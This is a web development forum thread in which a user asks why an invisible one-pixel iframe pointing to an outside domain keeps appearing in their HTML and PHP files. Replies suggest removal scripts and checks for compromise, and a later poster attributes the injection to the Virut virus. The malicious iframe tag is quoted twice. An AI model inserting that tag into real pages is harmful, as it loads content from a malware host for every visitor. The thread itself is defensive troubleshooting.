Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 9 of 9

Thread: I need help!!

  1. #1
    New to the CF scene
    Join Date
    Oct 2008
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    I need help!!

    I'm building a webpage but for some reason i'm getting this code <iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe> I've tried everything to attempt to get rid of this code but for some reason it keeps coming back. HOW DO I GET RID OF THIS! I need help its destroying my life lol!!! But seriously if anyone has ran into this problem please let me know what to do.

  • #2
    Senior Coder rangana's Avatar
    Join Date
    Feb 2008
    Location
    Cebu City, Philippines
    Posts
    1,752
    Thanks
    65
    Thanked 372 Times in 365 Posts
    How did that code came into your markup? That's odd.

    You could remove that by:
    Code:
    <script type="text/javascript">
    window.onload=function()
    {
    	 var tags=document.getElementsByTagName('iframe');
    	 for(var i=0;i<tags.length;i++)
    		tags[i].style.display=tags[i].src.match(/zief.pl/gi)?'none':''; // Hide
    		// tags[i].parentNode.removeChild(tags[i]); // Remove the iframe
    }
    </script>
    Learn how to javascript at 02geek

    The more you learn, the more you'll realize there's much more to learn
    Ray.ph

  • #3
    Senior Coder gnomeontherun's Avatar
    Join Date
    Sep 2007
    Location
    Houston
    Posts
    2,846
    Thanks
    10
    Thanked 238 Times in 229 Posts
    Is it getting inserted when you write the code on the computer, or after you upload it to the server?

    You might want to check if your host account has been hacked. Also try using a different code editor if you think it was inserted before uploading.
    jeremy - gnomeontherun
    Educated questions often get educated answers, and simple questions often get simple answers.

  • #4
    The fat guy next door VIPStephan's Avatar
    Join Date
    Jan 2006
    Location
    Halle (Saale), Germany
    Posts
    8,636
    Thanks
    6
    Thanked 1,003 Times in 976 Posts
    If I insert the iframe URL into my adress bar I get a warning that this site (domain) is probably a hijacker site (only do this on Mac/Unix and with the latest Firefox, or if you have some really good security software). So you should update or change your CMS software or whatever (’cause I’d guess this is the weak part) and/or contact your host.

  • #5
    New to the CF scene
    Join Date
    Oct 2008
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Thank you all for the reply.

    rangana is this a JS code that I put in all my pages or is it a code that I can put in a new HTML file and run it to run through all my pages and remove it.

    What's happening is it inserts this code into all my web files (HTML and PHP) and not just 1 line. When I delete the line, hit save and re-open it it's back again.
    I was using Dreamweaver CS3 to create/edit the files as well as trying notepad but no matter what I edit with this comes back.

    The code is getting inserted on my computer before I upload it to the server

    jeremywilken I checked my host file before and didn't notice any entries other then the 127.0.0.1 localhost
    I just checked now and noticed that at the very top is where an entry was placed. 127.0.0.1 zief.pl
    This could be it so I'm going to remove it and see what happens.

    I'll let you guys know if it solves my problem or not.

  • #6
    Senior Coder gnomeontherun's Avatar
    Join Date
    Sep 2007
    Location
    Houston
    Posts
    2,846
    Thanks
    10
    Thanked 238 Times in 229 Posts
    It sounds like your hosting has been hacked. Check in your .htaccess file, check in your cgi-bin, check EVERY file for tampering, and then check with your hosting to help you. Sometimes the hosting provider is able to find these things much faster. Good luck!
    jeremy - gnomeontherun
    Educated questions often get educated answers, and simple questions often get simple answers.

  • #7
    Rockstar Coder
    Join Date
    Jun 2002
    Location
    USA
    Posts
    9,074
    Thanks
    1
    Thanked 328 Times in 324 Posts
    Quote Originally Posted by jeremywilken View Post
    It sounds like your hosting has been hacked. Check in your .htaccess file, check in your cgi-bin, check EVERY file for tampering, and then check with your hosting to help you. Sometimes the hosting provider is able to find these things much faster. Good luck!
    Well if the OP says it shows up on his computer before the file is uploaded, it sounds like an issue with his computer not his host.
    OracleGuy

  • #8
    Senior Coder gnomeontherun's Avatar
    Join Date
    Sep 2007
    Location
    Houston
    Posts
    2,846
    Thanks
    10
    Thanked 238 Times in 229 Posts
    Agh, misread. Sorry, retract my previous post...thanks for the catch.

    This is happening a lot now that I live in a non-English speaking country.
    jeremy - gnomeontherun
    Educated questions often get educated answers, and simple questions often get simple answers.

  • #9
    New to the CF scene
    Join Date
    Feb 2009
    Posts
    1
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Exclamation This is Virut

    Hi everyone,

    I found this forum on a Google search, and I've registered to warn everyone about <iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>

    This code is injected into HTM, PHP, and ASP by a virus called "virut."

    See:
    http://miekiemoes.blogspot.com/2009/...-throwing.html

    For technical details, visit:
    http://securitylabs.websense.com/con...logs/3300.aspx

    And, of course, Google "virut.

    If your PC is infected, take it off of any networks, be very careful with USB drives, and disconnect it from the internet. Virut infections have begun to skyrocket - be careful with this one. It's nasty.


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •